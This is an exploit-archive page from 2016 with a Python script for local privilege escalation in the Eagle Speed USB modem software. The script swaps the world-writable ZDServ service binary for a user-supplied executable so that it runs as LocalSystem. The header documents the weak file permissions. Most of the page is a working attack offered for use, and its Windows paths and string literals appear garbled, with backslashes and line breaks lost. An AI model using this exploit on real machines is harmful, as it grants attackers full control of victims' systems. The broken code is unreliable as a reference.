Home / exploitsPDF  

Eagle Speed USB Modem Software Privilege Escalation

Posted on 29 November 2016

#!/usr/bin/python -w
# Title : Eagle Speed USB MODEM SOFTWARE Privilege Escalation
# Date : 28/11/2016
# Author : R-73eN
# Tested on : Windows 7 ( Latest version of the software)
# Software : N/A ( Comes with the USB Modem)
# Vulnerability Description:
# When the Eagle Speed software is installed a service with name ZDServ is installed.
# The service itself has the right permissions which do not allow to reconfigure the binary
# but the path the binary is writable by any authenticated user.
#
# C:Userslowpriv>sc qc zdserv
# [SC] QueryServiceConfig SUCCESS
#
# SERVICE_NAME: zdserv
# TYPE : 110 WIN32_OWN_PROCESS (interactive)
# START_TYPE : 2 AUTO_START
# ERROR_CONTROL : 1 NORMAL
# BINARY_PATH_NAME : "C:ProgramDataDSupportDServDServ.exe"
# LOAD_ORDER_GROUP :
# TAG : 0
# DISPLAY_NAME : ZDServ
# DEPENDENCIES :
# SERVICE_START_NAME : LocalSystem
#
#
#
# C:Userslowpriv>icacls "C:ProgramDataDSupportDServDServ.exe"
# C:ProgramDataDSupportDServDServ.exe Everyone:(I)(F) <----------- Everyone has full permissions.
# NT AUTHORITYSYSTEM:(I)(F)
# BUILTINAdministrators:(I)(F)
# Victim-PClowpriv:(I)(F)
# BUILTINUsers:(I)(RX)
#
# Successfully processed 1 files; Failed processing 0 files
#
# This exploit takes as a parameter an exe file that will replace the ZDServ.exe and will run
# with full privileges when the service/computer is restarted.
#
# Video : https://youtu.be/o59SD8gXzlU
#

import os
import sys
import filecmp
path = "C:ProgramDataDSupportDServDServ.exe"
file_move = 'move "C:ProgramDataDSupportDServDServ.exe" "C:ProgramDataDSupportDServDServ.exe.bak"'
banner = "

"
banner +=" ___ __ ____ _ _ 
"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ /  | | 
"
banner +=" | || '_ | |_ / _ | | _ / _  '_  / _  | | 
"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ | |___ 
"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|

"
print banner

if(len(sys.argv) < 2):
print '
 Usage : exploit.py program.exe
'
print 'https://infogen.al/'
else:
program = sys.argv[1]
if(not os.path.isfile(program)):
print "[-] The parameter was incorrect, use a correct filename [-]"
exit(0)
if(not os.path.isfile(path)):
print "[-] File not found , propably service doesn't exists [-]
"
else:
print "[+] Backing up the binary [+]"
os.system(file_move)
print "[+] Copying the payload [+]"
os.system("copy " + program + " " + path)
if(filecmp.cmp(program,path)):
print "[+] Exploit successfull, wait for service to restart or reboot [+]"
else:
print "[-] Exploit failed [-]"

 

TOP

Malware :

Exploits :